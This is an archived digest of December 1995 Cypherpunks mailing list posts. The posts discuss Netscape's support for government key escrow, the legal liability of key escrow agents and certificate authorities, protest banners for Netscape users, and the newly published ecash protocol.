Message-ID: <pgpmoose.199512011139.6629@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


In the last few weeks, mostly under the subject of
creating a Cypherpunks Certification Authority,
someone mentioned legal liability of a CA if a
certified identity was misused.

I am looking for material to pass on to a REAL,
PAID net-savvy lawyer relating to this question.
In return for the money we pay him, he will
return an opinion on just what liability exposure
would be for, say, a large technical users group
who got into the CA business for PGP keys. And/or
what disclaimers or indemnities would be needed.

I would be happy to make his legal opinion
available to the list. IANAL, so I don't know just
what precedents, decisions, regulations, and so on
might be relevant. More information is always a
good thing.

Please:

1. reply to me by mail, not the list, unless there
is more general relevance to Cypherpunks. I'll
summarise.

2. Speculation is not useful.

thanks,
Greg.

-- 
Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Fri, 1 Dec 1995 17:52:33 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <951201114501.20a03b98@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


With regard to all this waving about Netscape giving in to key escrow...

First one question, and then some considerations. The question:

- How much of Netscape stock is in the hands of Netscape? I mean in the hands
of the people that work in/for the Company? And how much is in outsiders whose
only interest is earning as much as possible?

That is, my friends, the key point. When Netscape began selling shares, and
before and after that, they were (and still are) widely criticized in this
list.

I assume most cypherpunks didn't buy. I'd also bet many opportunists did. And
I'd bet many activists thought this was their chance to get a hold on the
development of Internet...

So, now we have that most of Netscape is owned by people that either don't
care but for money, or fundamental activists. And then, those people have to
take decisions.

And then they are faced with confronting their government who tells them what
to do if they don't want to have problems. And who probably offers some hidden
compensations to get their support (maybe tax reliefs?). And who menaces with
countermeasures if they don't agree.

Oh, they are also faced with lots of fundamentalistic priests who tell them
they'll go to hell if they don't give in. Or engage in a crusade against the
"evil" net.

What did you expect Netscape to do? The guys with the money and the control
won't face all the small shareholders and tell them they are going to be
"evil" against the gov. and the priests and the religious organizations,
and that they will face gov. restrictions, give up political and economic
advantages, etc.. to satisfy a bunch of cypherpunks that are continuously
complaining publicly against the company and don't even buy shares.

That's what I think that has happened. And I may be wrong. But there's a
lesson to learn: there is a lot of anti-crypto guys out there. Unknowledgeable
people, gullible persons, and fanatics who won't doubt doing anything to
get a total control of things. Either we try to educate them, make them
more knowledgeable and less gullible, or we fight back with our own companies
or buying more shares than them. Or both.

Sitting back and complaining won't help crypto, freedom or anything for that
matter at all.

That said, before blaming more on Netscape and asking a starting company
whose major asset is still shareholders instead of sales, we should think
better about the correct strategy.

Now, who's gonna offer some constructive ideas for a change?

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 2 Dec 1995 03:16:47 +0800
To: semper.fi@solutions.apple.com
Subject: GAK, Netscape, CyberDog, and you.
Message-ID: <v02120d0dace4adfb1c6c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Hi Semper Fi-ers!

I've been lurking on this list for a long time, and I haven't said much
here primarily because I'm not a developer. I mean, I've hired developers,
and sold the software I've had them build for me. Not very well, I might
add, which is why I try to do something else (talk and write) for a living
now. Frankly, I couldn't code my way out of a paper bag, which, of course,
is why I've not said much here. :-).

Anyway, something has come up which I think makes the world very
interesting, and I think you should know about it.

Netscape has come out in favor of what the government calls "key escrow",
but which most "cypher"-punks (and I seem to have become one over the last
year and a half) call GAK, for Government Access to Keys.

Here's the URL: http://www.cnet.com/Central/News/govt.html . This is a news
report of a speech that Jim Clark gave at a trade show in Boston this week.

Normally, as serious as this is in the rest of the world, that wouldn't
really rate a mention here, except for the fact that this presents a very
interesting set of opportunities for the *independent* Mac developer
community in the form of CyberDog, Apple's set of OpenDoc parts for the
internet. I'll get to that in a moment, but first, let me give you some
background on the problem.


Netscape's Jim Clark has quite a tightrope act going. He has a stock price
which gives Netscape a P/E ratio of something like 7,000 (the S&P average
right now is about 14), which means he really ought to get some revenue in
the door, or his investors are going to have his hide. The next thing is,
the government is a *really* big customer, and *they* want GAK, in case you
haven't noticed. ;-). Couple this with the fact that Netscape is pretty
much replicable by concentrated developer effort because its underlying
technology is an open standard, *and* the fact that any significant attempt
by them to create any real proprietary standards on the internet is
practically impossible in the long run, unless they get a whole lot of very
big customers in a hurry.

Now, it looks like that's what happened already, because a lot of very
large companies have signed on to using Netscape servers, but you can also
see how really weak Netscape's position is when Uncle Sam knocks on their
door and asks for a key escrow "bug" in every "secure" Netscape web
session.

This isn't the first time that Netscape has had problems with financial
cryptography and the law. Netscape made the papers recently because the
government-mandated SSL key-size in their export version was too small. (We
won't talk about the cognitive dissonance between the words "export" and
"internet" just yet...)  The "export" version of  Netscape Navigator got
cracked by a French grad student in a university computer lab, who broke it
just by running a bunch of background processes on his Sun workstations for
a couple days over a weekend. The ITARs, the arms export laws covering this
(cryptography is legally a munition, more cognitive dissonance), are now a
problem for everybody who wants to do business securely and safely on the
internet.

More to the point, since digital bearer certificate technology, the most
economical method for doing business on the net, is entirely based on
digital signatures, which in turn are entirely based on very strong public
key cryptography, all business on the internet will eventually require very
strong cryptography. In other words, if you don't have unbreakable key
sizes, you can't issue digital certificates to pay for things with. It
would be like having paper money which is easy to forge.

Lately, I like to say that "Digital Commerce *is* Financial Cryptography",
and it's true. First Virtual has the only truly "out of band" internet
transaction settlement mechanism, it's very well-designed, and very robust,
but you have to remember that they did it *because* of the ITARs, and the
complications for financial cryptography those regulations cause, no matter
how much First Virtual itself likes to "dis" financial cryptography as a
concept. Unfortunately, the transaction costs on such out-of-band methods
are always going to be higher because of the inefficiencies of not
instantly settling transactions, like you can with something like digital
cash. When you buy something in the store for cash, you initiate, settle
and clear the trade all at once, right there at the cash register, without
an audit trail to maintain. Frankly, *any* credit card trade is really an
"out-of-band" method, because it has to go off of the net to clear and
settle, with audit trails, and the overhead of their offsetting
book-entries.

Fortunately, as governments start to figure this out, they will have to
stand back and let the economic train go by, so to speak.


So, having said all that, let's talk about OpenDoc and CyberDog.

I hear that with CyberDog, building a secure Netscape-compatible browser in
OpenDoc is now pretty simple. That adding economically useful -- and
interchangeable -- functionality like strong encryption, digital cash
protocols and most of the tools of digital commerce is also pretty
straightforward. That is, even though they have to be developed separately,
because Apple justifiably doesn't want to have the ITARs limiting its
export market for both OpenDoc and CyberDog. Again that cognitive
dissonance between "export" and "internet".

In addition to building utterly secure browser-server links, I see some
interesting OpenDoc digital commerce applications coming out of a
Netscape-compatible browser. My favorite "flash" on this was imagining the
ability to drag Digicash ecash dollar bill icons out of a wallet and
dropping them on a cash-register icon in a web page to pay for a
transaction. That's certainly doable with OpenDoc and CyberDog.

In addition, the IETF has just promulgated a secure link-level encryption
standard called IPSEC, which allows for encrypted links between any two
machines on the net, with any cryptographic method you want. That looks
like a great Open Transport Streams Module project to me. And the weird
thing is, once IPSEC is out there, GAK in Netscape becomes moot, anyway.
Netscape can only shoot itself in the foot here, and it looks like they
already have, with a premature announcement of GAK.


One final thing about Netscape. It's not their fault. There is no evil
man-behind-the curtain in all of this. The government's doing what it
thinks necessary for the preservation of order, and thinks it needs GAK to
do that. Netscape is doing the best it can for its (newly rich)
stockholders, and thinks it needs to comply with Uncle Sam, which it
probably in fact has to do, or burst its stock market price sooner, rather
than later.

Also, there is no reason why Netscape can't make a Navigator OpenDoc part,
and I expect that they are planning to. I bet that Apple would really like
that, and as a matter of fact, is probably courting Netscape to do exactly
that.

But I also know that by using OpenDoc and CyberDog, that the user can
create a very easy to use, flexible, extensible, and *powerful* internet
environment. Being there first with a Netscape-compatible browser,
especially one that doesn't have GAK built into it, will be worth a whole
lot in the marketplace for any enterprising independent OpenDoc parts
developer.


I'm going to be giving a talk on Wednesday at noon at Apple's Town Hall, (4
Infinite Loop) in Cupertino about what I'm calling "geodesic" markets, that
is,  financial cryptography on the internet.  The URL for a web page with
all the details is

http://thumper.vmeng.com/pub/rah/talk.html .

In addition, if you want more stuff on financial cryptography, you might
want to try my e$ home page, which is in my .sig, below.

Finally, I've asked an *actual* financial cryptographer, Eric Hughes, who
many of you may know from the cypherpunks mailgroup, and from the Clipper
fight, to show up at the Cupertino talk and bail me out on the real hard
questions.


Well, that's about it. Oh. The talk is titled "Financial Cryptography for
Dogs". I think you can see why, in light of the events of the last week,
it's quite appropriate.

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Sat, 2 Dec 1995 02:27:16 +0800
To: cypherpunks@toad.com
Subject: Re: "Got a subpoena?"
Message-ID: <m0tLZ6C-00035KC@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:57 PM 11/30/95 -0500, JHupp@Gensys.Com wrote:

>	And at that point, you shut down the remailer and log each and every 
>bounce.
>
>	Now, they could get an order forcing you to run a remailer ~ but that 
>would open up a whole new can of worms i.e. can you be forced, under 
>court order, to commit a crime?
  
That's not how they do it.  They will tell you that unless you cooperate,
you will be charged for the "crime" you have been committing.  Where do you think
confidential informants come from?  They're just people who have been caught
or set up by the cops, who are trying to save their own ass.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 2 Dec 1995 05:09:36 +0800
To: cypherpunks@toad.com
Subject: Re: Barring access to Netscape
Message-ID: <199512012008.MAA01222@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


IMHO, all the people who are planning to alter web pages to deal with the
Netscape/GAK issue should consider the following points:

(1) A recent large web site reported that 95% of their accesses were from
Netscape browsers.

(2) You want to inform the public and put pressure on Netscape, not piss
off the people using netscape browsers.  A quick, one page, detour would
seem appropriate, but not denial of access or other hostile acts.

(3) You should save some room for escalation.  (e.g. denial of access etc.)
Don't hit them with everything in the first round.

(4) Any list of alternative browsers has to include at least one viable
browser for each of the major platforms.  (At least, Windows, Mac, SunOS,
Solaris, HP, AIX, BSD, Linux.  Probably a lot more.)

Bill Frantz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 2 Dec 1995 05:08:35 +0800
To: cypherpunks@toad.com
Subject: Re: Media Advisory: GAK on Dec 5
Message-ID: <199512012008.MAA01226@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 17:26 12/1/95 +0100, Anonymous wrote:
>Nov. 6, 1995
>Contact:  Anne Enright Shepherd
>(301) 975-4858
>anne.shepherd@nist.gov
>
>
>                         MEDIA ADVISORY
>          
>            U.S. GOVERNMENT SEEKS PUBLIC COMMENT ON
>                                
>        DRAFT EXPORT CRITERIA FOR KEY ESCROW ENCRYPTION
>
...
>... The exportability 
>criteria being proposed are for  an expedited licensing review 
>process for software key escrow encryption products with  keys 
>up to 64 bits long.
...

Sounds like they want both GAK and brute force attacks to work.  Perhaps
they are worried that Labour will win in Britain and turn off their access
to the British GAK agent.

Bill Frantz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Sat, 2 Dec 1995 05:18:14 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Netscape gives in to key escrow
Message-ID: <v02120d00ace510ca1c12@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


>If they tell you about it and you buy it anyway -- tough luck.
>
>
>Same with the cars.  Would *you* buy a Pinto with explosives in it????
>(leaving aside the "inherently dangerous" argument for the moment on the
>products liability claim).
>
>EBD

Hmm. The key point is that almost no general users will have a clue what
actual security is, and what GAK is. They _might_ understand the risks of
having an explosive in their vehicle (but can just as easily argue it wasn't
properly designed if it went off improperly.) Regardless of what they'd know
about their vehicle, they can easily claim to have had the risks associated with
GAK improperly represented, Netscape misleading them with deceptive claims
of security given this potential hole etc.

I'm not saying whether or not this is the case, but we are very much in a
legal period where individuals are in fact expected not to need common sense,
and corporations are responsible for cleaning up after consumer stupidity.

It is certainly true that given the general state of education regarding
crypto, the average consumer can easily say that regardless of warnings about
GAK, that they weren't properly informed of the risk. With all the hype
around security, Netscape and encryption people will be under the
impression regardless of one little disclaimer tag, that their
information is safe. Neither
government nor corporations will disabuse them of this belief. The case
would be strong against them as a consumer.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 2 Dec 1995 02:09:53 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: I Agree buttons, GAKzilla & liability.
In-Reply-To: <Pine.3.89.9512010932.A35746-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.BSF.3.91.951201121744.25297B@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995 s1113645@tesla.cc.uottawa.ca wrote:

> On Fri, 1 Dec 1995, Brian Davis wrote:
> 
> > Well that would depend on the terms of the agreement to hold the escrowed 
> > keys, wouldn't it?   And presumably the GAK keyholder will have lawyers 
> > write the agreement so that it says, in essence, "we will try really 
> > really hard not to let the keys out, but if they get out, our only 
> > liability is to say 'Ooops' followed by a heartfelt apology!"
> 
> <IANAL>
> This sounds like the fine print you "agree" to by opening commercial software
> packages. Hasn't this been found void in a couple of places? The "OK"  or 


"I agree" that shrinkwrapped licenses are problematic, at best.  I don't 
think the analogy applies, though.  Maybe I'm mixing threads up, but I 
thought the topic was "Why would anyone agree to escrow keys commercially 
-- given the high risk if the keys get out?"

If that is the topic, then the keys would be escrowed by one of two 
parties:  the software developer or the customer.  If the customer does 
it, through an active act on his part, then no problem -- he's expressly 
consented (not a "shrinkwrap license" problem in my view if he sends them
his key ...).

If the software developer gives the key to the C/GAK escrow agent, then 
all that should be necessary is to warn the consumer that there is a 
backdoor through the escrowed key.  Then the consumer can buy the product 
or not, but knows what he is getting so can make a choice.

As long as the escrow aspect is not hidden, I don't see any fraud.  The 
remedy is the marketplace.  It is a long fall from $5,000,000,000 ...

EBD




> "I Agree" buttons I'm forced to press (but you don't *have* to download 
> software, nya,nya,nya...) when downloading wares also comes to mind.
> Has this been tested in a court? (Sega's reverse engineering suit from 
> a while back comes to mind)
> 
> Pressing buttons is hardly the same as your notarized handwritten signature
> on paper (we prefer blood, it's more permanent), or its digital equivalent.
> Mere tokenism, not insurance. 
> </IANAL>
> 
> About JR's concern about Netscape's shareholders, they're playing a bubble
> market and they know it. I wish them all the money and luck; luck is 
> something they're gonna need if this is to go on.
> 
> Ps. Netmanage websurfer ain't so bad, hint, hint, hint (detraction time 
> netscape). 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 2 Dec 1995 02:15:48 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199512011533.KAA19471@homeport.org>
Message-ID: <Pine.BSF.3.91.951201122459.25297C@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Adam Shostack wrote:

> Brian Davis wrote:
> 
> | On Thu, 30 Nov 1995, Adam Shostack wrote:
> 
> | > 	One thing that stockholders do care about is liability.  It's
> | > my (non lawyerly) opinion that anyone implementing GAK without a
> | > government mandate to do so is opening themselves up to huge liability
> | > the Clipper database of keys gets out.
> 
> | Well that would depend on the terms of the agreement to hold the escrowed 
> | keys, wouldn't it?   And presumably the GAK keyholder will have lawyers 
> | write the agreement so that it says, in essence, "we will try really 
> | really hard not to let the keys out, but if they get out, our only 
> | liability is to say 'Ooops' followed by a heartfelt apology!"
> 
> 	I'm not sure that's true.  Allow me to argue by analogy.
> 
> 	A car company, hearing the FBI's laments about cars being used
> as getaway vehicles after bank robberies, starts a program of putting
> explosives in all their cars, with radio detonators.  In an
> unfortunate accident, some of the explosives go off for no reason,
> injuring the owner of the car, etc, etc.  It seems to me that the car
> maker would be quite liable for doing something stupid (putting
> explosives in the engine block), even though they didn't cause the
> explosion.

I'm presuming that the consumer is aware of the key escrow.  It would 
indeed be foolhardy for Netscape to try to hide that, given the liability 
problem and the cypherpunks available to discover the "hidden" escrow.

If they tell you about it and you buy it anyway -- tough luck.


Same with the cars.  Would *you* buy a Pinto with explosives in it????
(leaving aside the "inherently dangerous" argument for the moment on the 
products liability claim).

EBD




> 
> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 2 Dec 1995 17:11:15 +0800
To: rah@shipwright.com
Subject: Re: GAK, Netscape, CyberDog, and you.
Message-ID: <9512011745.AA21052@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Bob,

Please stop this habit of cross-posting to every mailing list; 999 times
out of a thousand the resultant discussion helps neither list.  And my god,
five lists this time, at least some of which have over a thousand readers?

NB:  Followups redirected.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Dec 1995 03:56:36 +0800
To: cypherpunks@toad.com
Subject: Re: CPunks in the news: St. Jude
Message-ID: <ace491bc0a021004b6c9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:12 PM 12/1/95, Jim Gillogly wrote:
>Today's (1 Dec 95) LA Times has a writeup on female "hackers", and gives
>several sympathetic column-inches to St. Jude Milhon, a charter Cypherpunk.
>Evidently she has a new book coming out (Girls with Modems?).

I saw a book yesterday along the lines of "Girl Hackers" (or should it be
the Cybernetically Correct "Grrl Hackers"?) I forget the exact title and
author, but it's written in the typically breezy, cut-and-paste style
pioneered by Stewart Brand and Ted Nelson and now apparently the only
acceptable form for anything connected to the Net.

Interviews with Jude Milhon and Romana Machado (aka "Cypherella"). (For
more on Romana and her Cypherella persona, see
http://www.best.com/~fqa/romana/)

I didn't buy it, though I did buy the "Cyberpunk's Handbook" a few months
ago. It was co-authored by Jude, with Eric Hughes as the cover model.
Others have reviewed it here recently.

And Jude has another book coming out, something like "How to Mutate and
Take Over the World."

Personally, I find it distasteful--just my opinion, with no aspersions cast
on Jude, Romana, Eric, Robert, etc.--that so much blatant self-promotion is
becoming the norm. (Yes, I know I agreed to be one of the "cover models"
for the issue of "Wired" on "Crypto Rebels," but this was almost 3 years
ago and I think now I wouldn't agree to it--in fact, I've turned down a
dozen requests for interviews recently, feeling the planned interviews were
fluffery and not substantive.)

It seems that the media loves to see the extreme side of people, and
encourages really strange antics and bizarre self-labelling. The glut of
Internet magazines ("Wired," "Net Guide," "Infobahn," etc.) and the even
greater glut of pop culture mags with Internet connections ("Raygun,"
"Detail," and a dozen others, mostly with Traci Lords or Sandra Bullock on
their covers) means there must be some appetite for these personality
pieces. And the more outrageous a persona, the more coverage.

(Recall that one Cypherpunk list reader saw the British t.v. show that
covered Cypherpunks and mentioned "a porn star named Cypherella who writhed
on the floor while describing PGP"...I didn't see this show, but I presumed
he was seeing Romana in her "crypto bondage and discipline" outfit. I count
Romana as a friend, though I haven't seen her in a long time, but I
_personally_ am slightly embarrassed at this sort of thing...again, no
aspersions cast against her choices in life.)

(I expect this will find its way to Romana--Hi, Romana!--courtesy of her
friends and/or of search engines like Deja News, and I suppose I really
should take this out so as to avoid any hard feelings. But, I guess I
won't. Jude, Romana, Lisa Palac, and all the other "cybergrrls" are just
players in the media fascination with such things. To each their own. I
don't have to buy the books or magazines which extol them, so all is well.)

The "cult of personality" is alive and well in cyberia.

--Tim May, expecting some angry e-mail over the next few weeks


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ali Bahreman <ali@eit.com>
Date: Sat, 2 Dec 1995 06:25:24 +0800
To: daw@CS.Berkeley.EDU
Subject: RE: digital receipts and cash
Message-ID: <199512012117.NAA22727@penetralium.eit.com.>
MIME-Version: 1.0
Content-Type: text/plain


I have a paper on "Certified Electronic Mail" which I feel helps in your
quest to create "digital receipts".  See my home at www.eit.com/~ali for
pointers.  The paper was published at the 1994 ISOC Symposium jointly 
with my thesis advisor, Doug Tygar.

Regards,

Ali




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 2 Dec 1995 03:28:47 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512011842.NAA43335@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[Warning: More linguistic than crypto relevance follows.]

Tim wrote:

<snips>

>At 10:45 AM 12/1/95, JR@ns.cnb.uam.es wrote:
>>With regard to all this waving about Netscape giving in to key scrow...
>
>Key _escrow_, though "scrow" is perhaps just as accurate as the
>improperly-named "key escrow"

Indeed. One of the main libertarian objections to the term "key escrow"
is the "it's Newspeak" objection. "Escrow" [from the Hypertext Webster 
Interface at http://c.gp.cs.cmu.edu:5103/prog/webster?escrow ] means:
__________
1. es.crow \'es-.kro-, es-'\ n [MF escroue scroll] 1: a deed, a bond,
money, or a piece of property delivered to a third person to be delivered
                                             ^^^^^^^^^^^^
by him to the grantee only upon the fulfillment of a condition 2: a fund
or deposit designed to serve as an escrow 
2. es.crow \es-'kro-, 'es-.\ vt : to place in escrow 
__________ [emphasis added.]

The number of cases that begin: "US v. ___," or that end: "___ v. US,"
puts the lie to the idea that the government could somehow be *any
sort* of a "third person" in many of the cases that come before the
(government employees, albeit with some autonomy, known as) judges.
Mine is, of course, the libertarian view of "the government as one
giant blob," as opposed to various contrary views of "the government
as many wonderful-but-separate agencies who are all just trying to
do their best." My view, while certainly not the majority view, is
pervasive enough that [IMO] the current government terminology of
"key escrow" *should* change to a less Orwellian term.

> (hint: escrow is something done voluntarily, not the situation here
> with GAK).

I liked the term "FUCKED" better, but I guess I can settle for "GAK."
JMR

Regards, Jim Ray --  http://www.shopmiami.com/prs/jimray

Al Gore's mission is to reinvent government. He seems to have started
with the office of the vice president. His staff is 48 percent larger
than Dan Quayle's was. -- Reason "Brickbats" October, 1995 issue.

- -----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty@gate.net> IANAL
- -----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 2 Dec 1995 07:04:09 +0800
To: perry@piermont.com
Subject: Re: Barring access to Netscape
In-Reply-To: <199512012028.PAA08954@jekyll.piermont.com>
Message-ID: <199512012157.NAA00703@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> You can get your server to simply put that at the top of every page
> served to a Netscape client, followed by a horizontal line and the
> normal web page. It should be easy to put together the hacks to do
> that and get them out to lots of people. Watch how fast people would
> switch from Netscape, especially were it widely deployed. You would
> then watch a fast fall in Netscape stock, which would likely piss Jim
> Clark off far more than anything else one could do.
> 

	Perry's suggestion has my vote, and will be implemented at
c2.org when lance puts up his page.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Date: Sat, 2 Dec 1995 08:27:43 +0800
To: cypherpunks@toad.com
Subject: The ecash protocol (for real)
Message-ID: <199512012218.OAA20007@cory.EECS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Well, they did it.  Probably quite a few people are sending something
to this effect to CP right now, and we're crossing paths.

Check out http://www.digicash.com/ecash/protpublish.html.

Analysis is forthcoming (I'll probably have something useful to say
by the December Bay Area meeting...).

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 2 Dec 1995 03:56:01 +0800
To: ecarp@netcom.com
Subject: Re: Barring access to Netscape
Message-ID: <v02130500ace47ad3fce4@[165.254.158.210]>
MIME-Version: 1.0
Content-Type: text/plain


At 0:32 12/1/95, Ed Carp wrote:

>If you want to bar access to your site from a Netscape browser, such
>can easily be accomplished.  If memory serves, every browser, when
>connecting to a site, exchanges certain information about the client
>with the server.  One can gain access easily to that information.
>
>I believe that Netscape uses "Mozilla" as their keyword when
>exchanging browser-specific information.

If you want to see one way of locking out Netscape users, check out this
URL which points at a Web Page that will not allow access by Netscape Users
(the guy is ticked off at them trying to establish their own standards) -


http://www.ccs.neu.edu/home/ratinox/angels/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 3 Dec 1995 04:59:31 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: WTO an even worse possibility as Inet regulator.
In-Reply-To: <Pine.BSD.3.91.951201050752.28674C-100000@ahcbsd1.ovnet.com>
Message-ID: <Pine.SUN.3.91.951201142329.26674E-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Oh dear.  First off, it's the "Royal Institute of International Affairs"

Second, I haven't read or seen the report although I ordered it yesterday.

Third....<disclosure>...I am a Foreign Associate of RIIA...</disclosure>. 
They do nice seminars in a nice part of London near where I once worked.

Fourth, RIIA is a think tank, that is part of the UK establishment but not
part of the government, much like Brookings, Hoover Institution, Council
on Foreign Relations, are in the U.S.  It doesn't speak for the UK
government, and sometimes criticizes it (usually politely).  It doesn't
necessarily speak for business, although it certainly speaks *to* it and 
about it.

Fifth, that doesn't mean the report is right.  Or necessarily influential.
RIIA issues lots of reports, several a month, and most sink without a
visible trace.  But some don't.  So, it could be influential.  Especially
in the UK.  Depends how good/scary it is. I'll report if my copy ever gets
here.  With the Xmas mails, I figure January at best. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Sat, 2 Dec 1995 05:42:33 +0800
To: cypherpunks@toad.com
Subject: nsa and netscape (fwd)
Message-ID: <m0tLc8O-00057cC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>

> 
>   The following came from a government source. I thought it might be of
>   interest. 
>                        Bob
> --------------------------------------------------------------------------
> 
>      At yesterday's FNC  (Federal Networking Council) meeting it was 
>      mentioned in passing that NSA has given Netscape a grant of $5 Million 
>      (yes $5M) to beef up the security features of Netscape. More info will 
>      be forthcoming on this.
> 

I found my way to http://www.fnc.gov, but the most recent documents
that they had online were about three weeks old. 

I, too, am curious what the source for this was.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Sat, 2 Dec 1995 08:33:58 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Netscape gives in to key escrow
Message-ID: <v02120d02ace53224f233@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain



>And thus we return to my original point, which is that it will depend on
>what is said/disclosed.  If every copy of GAKscape had a banner, bigger
>than the Netscape "N" which said, "The government can read every message
>you send using this software no matter what you do" then I think
>consumers will be hard pressed to say they weren't warned.

I don't mean to be inflammatory, but it isn't much of a point. They aren't
going to put such a banner up because that would limit their business. The
goal of Netscape (though I don't single them out), any corporation that would
profit from business of those who seek encryption while still allowing GAK,
and the government, is to limit the public's awareness of the size of the
hole. If they let people know the extent of the hole, then they'll use
products w/out it which blows profits from companies involved, and doesn't
benefit the government who want it in common use.

>I disagree.  Almost nobody reads the fine print on the back of a note you
>sign when you buy a car or otherwise take out a loan, but the provisions
>are generally enforceable ...  Ignorance is not necessarily an excuse.

